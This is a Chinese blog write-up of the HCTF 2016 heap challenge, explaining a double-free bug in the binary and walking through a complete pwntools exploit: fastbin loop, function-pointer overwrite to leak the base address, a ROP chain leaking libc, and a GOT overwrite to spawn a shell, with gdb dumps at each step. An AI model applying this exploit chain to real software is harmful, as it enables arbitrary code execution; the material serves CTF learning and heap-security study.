一个实例讲解fastbins上的堆利用

最新推荐文章于 2024-11-19 20:22:08 发布
最新推荐文章于 2024-11-19 20:22:08 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 系统调试 文章标签: fastbins hctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_35519254/article/details/77863975
版权
本文详细分析了hctf2016比赛中一道关于fastbins的题目,通过创建、删除字符串操作,展示了如何利用fastbins进行堆溢出攻击。文章通过Python脚本演示了利用过程,包括修改free函数指针为puts地址,获取ELF基址,以及构造payload绕过DEP并执行system获取shell。最后,提供了相关参考资料链接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这道题是hctf2016年“就是干”那道题。附件有下载地址及writeup。我就是分析一下:

首先IDA分析一下:
新建两个结构体 
00000000 str_struct      struc ; (sizeof=0x20)
00000000 str             dq ?
00000008 str_padding     dq ?
00000010 size            dq ?
00000018 free_func       dq ?
00000020 str_struct      ends
00000020
00000000 ; ---------------------------------------------------------------------------
00000000
00000000 str_list        struc ; (sizeof=0x10)   ; XREF: .bss:string_listr
00000000 flag            dq ?
00000008 str_ptr         dq ?
00000010 str_list        ends


这两个结构体非常重要了,涉及到后边堆的利用,首先介绍一下第一个结构体str_struct吧,大小是0x20,当要保存的字符串大小小于0xf 时,字符串就保存在0x0-0xf处,当保存的字符串大小大于0xf时,0x0-0x8保存一个指针,指向字符串的地址。 0x10-0x17表示字符串的大小,0x18-0x1f表示free函数的地址。

再介绍一下str_list结构体,当创建string时,置flag=1,当delete string,置flag=0,str-ptr指向str_struct结构体。

然后我把IDA的伪代码贴出来,方便以后分析: 
__int64 create_string()
{
  signed int i; // [sp+4h] [bp-102Ch]@12
  str_struct *string_struct; // [sp+8h] [bp-1028h]@1
  char *dest; // [sp+10h] [bp-1020h]@8
  unsigned __int64 nbytes; // [sp+18h] [bp-1018h]@1
  unsigned __int64 nbytesa; // [sp+18h] [bp-1018h]@6
  char buf; // [sp+20h] [bp-1010h]@3
  __int64 canary; // [sp+1028h] [bp-8h]@1

  canary = *MK_FP(__FS__, 40LL);
  string_struct = (str_struct *)malloc(0x20uLL);
  printf("Pls give string size:");
  nbytes = read_int();
  if ( nbytes <= 0x1000 )
  {
    printf("str:");
    if ( read(0, &buf, nbytes) == -1 )
    {
      puts("got elf!!");
      exit(1);
    }
    nbytesa = strlen(&buf);
    if ( nbytesa > 0xF )
    {
      dest = (char *)malloc(nbytesa);
      if ( !dest )
      {
        puts("malloc faild!");
        exit(1);
      }
      strncpy(dest, &buf, nbytesa);
      string_struct->str = (__int64)dest;
      string_struct->free_func = (__int64)free_2;
    }
    else
    {
      strncpy((char *)string_struct, &buf, nbytesa);
      string_struct->free_func = (__int64)free_1;
    }
    LODWORD(string_struct->size) = nbytesa;
    for ( i = 0; i <= 15; ++i )
    {
      if ( !LODWORD(string_list[i].flag) )
      {
        LODWORD(string_list[i].flag) = 1;
        string_list[i].str_ptr = (__int64)string_struct;
        printf("The string id is %d\n", (unsigned int)i);
        break;
      }
    }
    if ( i == 16 )
    {
      puts("The string list is full");
      ((void (__fastcall *)(str_struct *))string_struct->free_func)(string_struct);
    }
  }
  else
  {
    puts("Invalid size");
    free(string_struct);
  }
  return *MK_FP(__FS__, 40LL) ^ canary;
}




__int64 delete_string()
{
  int sid; // [sp+Ch] [bp-114h]@1
  char buf; // [sp+10h] [bp-110h]@5
  __int64 v3; // [sp+118h] [bp-8h]@1

  v3 = *MK_FP(__FS__, 40LL);
  printf("Pls give me the string id you want to delete\nid:");
  sid = read_int();
  if ( sid < 0 || sid > 16 )
    puts("Invalid id");
  if ( string_list[sid].str_ptr )
  {
    printf("Are you sure?:");
    read(0, &buf, 0x100uLL);
    if ( !strncmp(&buf, "yes", 3uLL) )
    {
      (*(void (__fastcall **)(__int64, _QWORD))(string_list[sid].str_ptr + offsetof(str_struct, free_func)))(
        string_list[sid].str_ptr,
        "yes");
      LODWORD(string_list[sid].flag) = 0;
    }
  }
  return *MK_FP(__FS__, 40LL) ^ v3;
}



主要就是这两个函数了
问题就出在delete函数string_list[sid].str_ptr 这一句,本来是判断flag的,这里变成了判断其他的,所以可以free一个已经free的块了。

咱们还是根据exploit来具体分析一下吧 ,先贴代码: 
#!/usr/bin/python
#coding:utf-8

from pwn import *

#r = remote('127.0.0.1', 4444)
r=process('./pwn-f')

def create(size, string):
    r.recvuntil('quit')
    r.sendline('create ')
    r.recvuntil('size:')
    r.sendline(str(size))
    r.recvuntil('str:')
    r.send(string)

def delete(id, sure = 'yes'):
    r.recvuntil('quit')
    r.sendline('delete ')
    r.recvuntil('id:')
    r.sendline(str(id))
    r.recvuntil('sure?:')
    r.sendline(sure)

pause()
create(4, 'aaa\n')
create(4, 'aaa\n')
delete(0) # fastbin->chunk0
delete(1) # fastbin->chunk1->chunk0
delete(0) # fastbin->chunk0->chunk1->chunk0
create(4, '\x00') # 长度为0,没有拷贝 fastbin->chunk1->chunk0->chunk1
# malloc-ptr: fastbin->chunk0->chunk1
# malloc-dest: fastbin->chunk1
create(0x20, 'a' * 0x16 + 'lo' + '\x2d\x00') # 0x2d会覆盖free func的最后一位,覆盖为puts的地址
delete(0)
r.recvuntil('lo')
puts_addr = r.recvline()[:-1]
base_addr = u64(puts_addr.ljust(8, '\x00')) - 0xd2d
print 'base_addr = ' + hex(base_addr)

delete(1) # 调用free2,先free chunk0再free chunk1: fastbin->chunk1->chunk0->chunk1
create(4, '\x00') # fastbin->chunk0->chunk1->chunk0
# malloc-ptr: fastbin->chunk1->chunk0
# malloc-dest: fastbin->chunk0
create(0x20, 'a' * 0x18 + p64(base_addr + 0x11dc)) # pop_pop_pop_pop_ret

payload = p64(base_addr + 0x11e3) # pop_rdi_ret
payload += p64(base_addr + 0x202070) # malloc@got
payload += p64(base_addr + 0x990) # puts@plt
payload += p64(base_addr + 0x11e3)
payload += p64(1)
payload += p64(base_addr + 0x11da) # pop6_ret
payload += p64(0) # rbx
payload += p64(1) # rbp
payload += p64(base_addr + 0x202058) # r12 -> rip read@got
payload += p64(8) # r13 -> rdx
payload += p64(base_addr + 0x202078) # r14 -> rsi atoi@got
payload += p64(0) # r15 -> rdi
payload += p64(base_addr + 0x11c0) # 通用gadget
payload += 'a' * 8 * 7
payload += p64(base_addr + 0xb65) # read_num
delete(1, 'yes'.ljust(8, '\x00') + payload)

malloc_addr = u64(r.recvline()[:-1].ljust(8, '\x00'))
libc_addr = malloc_addr - 0x84130
print 'libc_addr = ' + hex(libc_addr)
system_addr = libc_addr + 0x45390
print 'system_addr = ' + hex(system_addr)
r.sendline(p64(system_addr) + '/bin/sh')

r.interactive()




create(4, 'aaa\n')
create(4, 'aaa\n')


创建两个堆块,大小都是4,因为小于0xf,所以直接写到结构体str_struct中:

这就是此时的内存布局,其中id=0的表示0x557a3c652000的堆,id=1的表示0x557a3c652030的堆
0x557a3c652020处表示string的大小,0x557a3c652028表示函数free的地址。

这里我们假设free地址如果可以被覆盖为其他函数的地址,那么其他函数就可以得到执行的机会了。。。 


delete(0) # fastbin->chunk0
delete(1) # fastbin->chunk1->chunk0
delete(0) # fastbin->chunk0->chunk1->chunk0



第一次调用delete(0): 
gdb-peda$ x/20gx 0x557a3c652000
0x557a3c652000:	0x0000000000000000	0x0000000000000031
0x557a3c652010:	0x0000000000000000	0x0000000000000000
0x557a3c652020:	0x0000000000000004	0x0000557a3c168d52
0x557a3c652030:	0x0000000000000000	0x0000000000000031
0x557a3c652040:	0x000000000a616161	0x0000000000000000
0x557a3c652050:	0x0000000000000004	0x0000557a3c168d52



第一次调用delete(1)后: 
gdb-peda$ x/20gx 0x557a3c652000
0x557a3c652000:	0x0000000000000000	0x0000000000000031
0x557a3c652010:	0x0000000000000000	0x0000000000000000
0x557a3c652020:	0x0000000000000004	0x0000557a3c168d52
0x557a3c652030:	0x0000000000000000	0x0000000000000031
0x557a3c652040:	0x0000557a3c652000	0x0000000000000000
0x557a3c652050:	0x0000000000000004	0x0000557a3c168d52


可以看到id=1的堆的fd已经指向了id=0的堆

第二次调用delete(0)后: 
gdb-peda$ x/20gx 0x557a3c652000
0x557a3c652000:	0x0000000000000000	0x0000000000000031
0x557a3c652010:	0x0000557a3c652030	0x0000000000000000
0x557a3c652020:	0x0000000000000004	0x0000557a3c168d52
0x557a3c652030:	0x0000000000000000	0x0000000000000031
0x557a3c652040:	0x0000557a3c652000	0x0000000000000000
0x557a3c652050:	0x0000000000000004	0x0000557a3c168d52


可以看到此时id=0的堆的fd也指向了id=1的堆,形成循环链表。
create(4, '\x00')
此时会从id=0的堆上创建堆。(因为此时的fastbins是这样的fastbins->chunk0->chunk1->chunk0)
创建后,内存结构是没有变化的,因为根本没有复制数据: 
gdb-peda$ x/20gx 0x557a3c652000
0x557a3c652000:	0x0000000000000000	0x0000000000000031
0x557a3c652010:	0x0000557a3c652030	0x0000000000000000
0x557a3c652020:	0x0000000000000000	0x0000557a3c168d52
0x557a3c652030:	0x0000000000000000	0x0000000000000031
0x557a3c652040:	0x0000557a3c652000	0x0000000000000000
0x557a3c652050:	0x0000000000000004	0x0000557a3c168d52



create(0x20, 'a' * 0x16 + 'lo' + '\x2d\x00') 此时的创建string就是重点了,创建前fastbins->chunk1->chunk0
先看一下create的内部工作原理吧 ,因为此时创建的string大小为0x20大于0xf,所以会在结构体 str_struct 起始处新建一个指针,指向一个堆,堆中保存string数据,堆的大小正好是0x20+0x10,而此时的fastbins链是:fastbins->chunk1->chunk0,所以会将保存string的堆指向chunk0(即id=0的堆)。
创建后内存布局: 
gdb-peda$ x/20gx 0x557a3c652000
0x557a3c652000:	0x0000000000000000	0x0000000000000031
0x557a3c652010:	0x6161616161616161	0x6161616161616161
0x557a3c652020:	0x6f6c616161616161	0x0000557a3c168d2d
0x557a3c652030:	0x0000000000000000	0x0000000000000031
0x557a3c652040:	0x0000557a3c652010	0x0000000000000000
0x557a3c652050:	0x0000000000000019	0x0000557a3c168d6c
‘lo’就是为了好识别,可以看到成功将chunk0的0x18-0x1f的最后一个字节修改为0x2d,也就是成功将函数free的地址指针修改为0x0000557a3c168d2d(此地址正好是call puts的地址) 

delete(0)
r.recvuntil('lo')
puts_addr = r.recvline()[:-1]
base_addr = u64(puts_addr.ljust(8, '\x00')) - 0xd2d
print 'base_addr = ' + hex(base_addr)


此时调用free函数,也就是调用我们的puts函数了,正好将0x557a3c652010-0x557a3c652030的数据打印出来了,这样就把(call puts)的内存地址打印出来了,然后就可以获取该ELF的基地址了。

delete(1)
首先说明一下,在调用create(0x20, 'a' * 0x16 + 'lo' + '\x2d\x00')后,此时fastbins->chunk1,然后是delete(0)因为此时实际调用的是puts函数,所以没有变化还是fastbins->chunk1。
当delete(1)时,内部调用free_2函数: 
.text:0000000000000D6C free_2          proc near               ; DATA XREF: create_string+18Co
.text:0000000000000D6C
.text:0000000000000D6C ptr             = qword ptr -8
.text:0000000000000D6C
.text:0000000000000D6C                 push    rbp
.text:0000000000000D6D                 mov     rbp, rsp
.text:0000000000000D70                 sub     rsp, 10h
.text:0000000000000D74                 mov     [rbp+ptr], rdi
.text:0000000000000D78                 mov     rax, [rbp+ptr]
.text:0000000000000D7C                 mov     rax, [rax]
.text:0000000000000D7F                 mov     rdi, rax        ; ptr
.text:0000000000000D82                 call    _free
.text:0000000000000D87                 mov     rax, [rbp+ptr]
.text:0000000000000D8B                 mov     rdi, rax        ; ptr
.text:0000000000000D8E                 call    _free
.text:0000000000000D93                 leave
.text:0000000000000D94                 retn
.text:0000000000000D94 free_2          endp


可以看到此时应该是先free chunk0,后free chunk1(chunk1首地址保存的是chunk0的指针),所以该操作后: fastbins->chunk1->chunk0->chunk1 
gdb-peda$ x/20gx 0x557a3c652000
0x557a3c652000:	0x0000000000000000	0x0000000000000031
0x557a3c652010:	0x0000557a3c652030	0x6161616161616161
0x557a3c652020:	0x6f6c616161616161	0x0000557a3c168d2d
0x557a3c652030:	0x0000000000000000	0x0000000000000031
0x557a3c652040:	0x0000557a3c652000	0x0000000000000000
0x557a3c652050:	0x0000000000000000	0x0000557a3c168d52



create(4, '\x00') 后 fastbins->chunk0->chunk1 
gdb-peda$ x/20gx 0x557a3c652000
0x557a3c652000:	0x0000000000000000	0x0000000000000031
0x557a3c652010:	0x0000557a3c652030	0x6161616161616161
0x557a3c652020:	0x6f6c616161616161	0x0000557a3c168d2d
0x557a3c652030:	0x0000000000000000	0x0000000000000031
0x557a3c652040:	0x0000557a3c652000	0x0000000000000000
0x557a3c652050:	0x0000000000000000	0x0000557a3c168d52


create(0x20, 'a' * 0x18 + p64(base_addr + 0x11dc))

在chunk0中创建指针指向chunk1,在chunk1中写入数据。 
gdb-peda$ x/20gx 0x557a3c652000
0x557a3c652000:	0x0000000000000000	0x0000000000000031
0x557a3c652010:	0x0000557a3c652040	0x6161616161616161
0x557a3c652020:	0x6f6c61610000001e	0x0000557a3c168d6c
0x557a3c652030:	0x0000000000000000	0x0000000000000031
0x557a3c652040:	0x6161616161616161	0x6161616161616161
0x557a3c652050:	0x6161616161616161	0x0000557a3c1691dc



可以看到成功将chunk1的free函数替换为pppr的地址。 

payload = p64(base_addr + 0x11e3) # pop_rdi_ret
payload += p64(base_addr + 0x202070) # malloc@got
payload += p64(base_addr + 0x990) # puts@plt
payload += p64(base_addr + 0x11e3)
payload += p64(1)
payload += p64(base_addr + 0x11da) # pop6_ret
payload += p64(0) # rbx
payload += p64(1) # rbp
payload += p64(base_addr + 0x202058) # r12 -> rip read@got
payload += p64(8) # r13 -> rdx
payload += p64(base_addr + 0x202078) # r14 -> rsi atoi@got
payload += p64(0) # r15 -> rdi
payload += p64(base_addr + 0x11c0) # 通用gadget
payload += 'a' * 8 * 7
payload += p64(base_addr + 0xb65) # read_num



payload用于绕过DEP,可以看到最后是调用puts将malloc函数地址打印出来。
利用read读取数据(system地址)到atoi@got中,这样当调用atoi函数时,system得到执行,获取了shell。
delete(1, 'yes'.ljust(8, '\x00') + payload)




查看fastbins链:
p &main_arena.fastbinsY


参考:
1. http://pwn4.fun/2017/02/25/fastbin上的堆漏洞利用/
马尔可夫链蒙特卡罗(MCMC)原理与代码实战案例讲解
AI天才研究院
10-08 1152
马尔可夫链蒙特卡罗(MCMC)原理与代码实战案例讲解 作者:禅与计算机程序设计艺术 / Zen and the Art of Computer Programming 1. 背景介绍 1.1 问题的由来 在许多科学
一文就懂HashMap原理!学不会你来砍我!
流楚丶格念的博客
08-12 2512
HashMap 基于哈希表的 Map 接口实现,是以 key-value 存储形式存在,即主要用来存放键值对。HashMap 的实现不是同步的,这意味着它不是线程安全的。它的 key、value 都可以为 null(但是key的位置只能有一个null),此外,HashMap 中的映射不是有序的。好,我们根据这里的简介看一个入门例子: 运行结果如下所示:这里的HashMap我是用的jdk8的,jdk1.7及以前和jdk1.8 及以后的HashMap是有很大区别的:下面我们说的HashMap都是jdk1.8 及
Fastbin的利用
u014377094的博客
03-05 730
我是传送门: pwn_wiki_fastbinattackFastbin Attack - CTF Wiki (ctf-wiki.org) how2heap GitHub - shellphish/how2heap: A repository for learning various heap exploitation techniques. bin结构 struct malloc_chunk { /* #define INTERNAL_SIZE_T size...
linux内存漏洞利用之fastbin
pang241的专栏
09-24 1908
背景介绍在前一节主要介绍了Glibc的内存管理的机制,在上一节的基础上,我打算介绍一下针对Glibc内存管理的攻击。此系列我打算按攻击面是哪一个bin来展开,主要分为: - fastbin的攻击 - smallbin的攻击 - largebin的攻击 - unsorted bin的攻击 - top chunk的攻击本文主要介绍fastbin的攻击fastbin漏洞利
利用学习之fastbin attack
Hpasserby的博客
10-06 796
原理 fastbin attack是一类漏洞的利用方法,是指所有基于 fastbin 机制的漏洞利用方法。主要利用了fast bin的单链表管理机制。 相关源码: malloc: /* If the size qualifies as a fastbin, first check corresponding bin. This code is safe to execute ev...
PWN -fastbin 解析
最新发布
m0_57836225的博客
11-19 928
在 PWN 技术的深入探索中,第 22 节聚焦于 fastbin,这是内存管理中的一个重要概念,对于理解内存分配策略以及挖掘相关漏洞具有关键意义。
fastbin attack快速入门
abelxu
11-13 1323
0x01 fastbin简介 Fastbin包含0x20~0x80大小bin的数组指针,用于快速分配小块。fastbin按照单链表结构进行组织,相同大小的bin在同一个链表中,fd指向下一个bin,采用LIFO(Last In First Out)机制。在fastbin中,块的inuse标志都为1,处于占用状态,防止chunk释放时进行合并,加快小块的分配。 正常fastbin的使用 通过这个简单的案例来了解fastbin的单链表结构,malloc和free的过程。 #include<stdio
一个实例讲解fastbins上的利用附件
09-06
总之,fastbins利用是一种高级的逆向工程和漏洞利用技术,它需要对操作系统内存管理有深入的理解。通过分析这个实例,你可以学习到如何查找和利用fastbins相关的内存漏洞,这对于提升你的安全技能和参加CTF...
深入剖析HCTF 2016中Fastbins利用技术
实例将通过 hctf 2016 的相关练习题来讲解 fastbins 上的利用技术。 #### 知识点一:内存分配机制 在 C 语言中,内存分配一般通过 malloc() 函数实现。malloc() 为程序员提供动态内存分配的能力。当 ...
【学习札记NO.00003】基于libc-2.23版本的malloc源码简易分析 - Part-I - 内存的基本组织形式 by arttnba3
arttnba3的博客
01-19 1331
【学习札记NO.00003】基于libc-2.23版本的malloc源码简易分析 - Part-I - 内存的基本组织形式 by arttnba30x00.内存的组织形式一、malloc_chunk[The \_\_alignof\_\_ operator](https://www.ibm.com/support/knowledgecenter/ssw_ibm_i_71/rzarg/sc09785202.htm?view=kc#ToC_180)二、chunk相关宏1.chunk size相关宏宏:off
DASCTF X GFCTF 2022十月挑战赛 Writeup
末初 · mochu7
10-28 2114
DASCTF X GFCTF 2022十月挑战赛 Writeup
linux适当内存,linux内存漏洞利用之fastbin
weixin_42245967的博客
04-30 438
背景介绍在前一节主要介绍了Glibc的内存管理的机制,在上一节的基础上,我打算介绍一下针对Glibc内存管理的攻击。此系列我打算按攻击面是哪一个bin来展开,主要分为:fastbin的攻击smallbin的攻击largebin的攻击unsorted bin的攻击top chunk的攻击本文主要介绍fastbin的攻击fastbin漏洞利用具体的fastbin的介绍请参考前一节和 Linux内...
fastbin attack
m0_64195960的博客
07-19 1475
FastbinDoubleFree是指fastbin的chunk可以被多次释放,因此可以在fastbin链表中存在多次。这样导致的后果是多次分配可以从fastbin链表中取出同一个块,相当于多个指针指向同一个块,结合块的数据内容可以实现类似于类型混淆(typeconfused)的效果。FastbinDoubleFree能够成功利用主要有两部分的原因fastbin的块被释放后next_chunk的pre_inuse位不会被清空1.1.1该技术的核心。......
2023Newstarctf week4 More Fast详解
2301_76690905的博客
10-30 412
s:3:"var";可以触发evil()方法,那我们就可以把实例化的web类传给pen类的obj属性,想要真正触发evil()还需要触发__invoke()魔术方法。因为当反序列化的时候第一层接受到的是一个包含两个元素的数组,该数组第一个元素是一个对象,其类名为 Start,第二个元素是一个整数(0),把第二个i后面的值改为0后,使得数组对象为空。,如果我们把实例化的pwn类传给这里的func属性,且触发__get魔术方法,那就会导致一个对象被当作函数调用,从而触发pwn里的__invoke魔术方法。
Glibc内存管理--ptmalloc2源代码分析(三十二)
iteye_7858的博客
05-30 397
5.8.2 _int_free() _int_free() 函数的实现源代码如下: static void #ifdef ATOMIC_FASTBINS _int_free(mstate av, mchunkptr p, int have_lock) #else _int_free(mstate av, mchunkptr p) #endif { INTERNA...
【逆向学习记录】分配中chunk&bins
卦星的专栏
03-23 3538
1 概述 学习的过程中,开始的时候,有个很难理解的东西,那个东西就是malloc,涉及到malloc就会涉及到chunk,实话说chunk这个东西的学习,确实经历了不少时间,总结一下,防止忘记 参考 Linux内存管理深入分析-上这篇文章详细将来chunk的进化过程,这里就不在深入查看了,深入浅出,是学习溢出基础的佳作 Linux内存管理深入分析-下这篇文章详细讲了bin的结构,并且被我大...
fastbin 利用小结之fastbin double free, house of spirit
chenzhenyu1983的博客
04-23 1558
fastbin 利用小结之fastbin double free, house of spirit1、fastbin chunk 结构未分配的chunk|         |  size  ||  fd  |         |已分配chunk|       |   size  ||    content     | ……malloc返回的指针指向content位置 2、Fastbin Doub...
malloc内存管理总结
大白的博客
08-14 5575
内存管理 内存管理主要包含两个层面的内容: 1、操作系统内核相关的内存管理:物理内存层 2、库函数层:主要是内存,即malloc实现层 如果用户还有需要会在用户层再做一次内存管理机制,例如SGI STL中的内存管理机制(二级配置器)。 由于篇幅有限,本文主要介绍库函数层的malloc实现机制。同时上述两层中由于操作系统等不同也存在差异,例如malloc层,Wind...
[pwn]:fastbin attack详解
热门推荐
Breeze的博客
12-31 1万+
[pwn]fastbin attack 文章目录[pwn]fastbin attackfastbin attack原理double freeuse after freechunk extend需要注意的点:0ctf:babyheap fastbin attack原理 fastbin attack是利用fastbin分配原理的漏洞,利用要求是我们能够修改“已释放”块。通常情况下与double fr...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值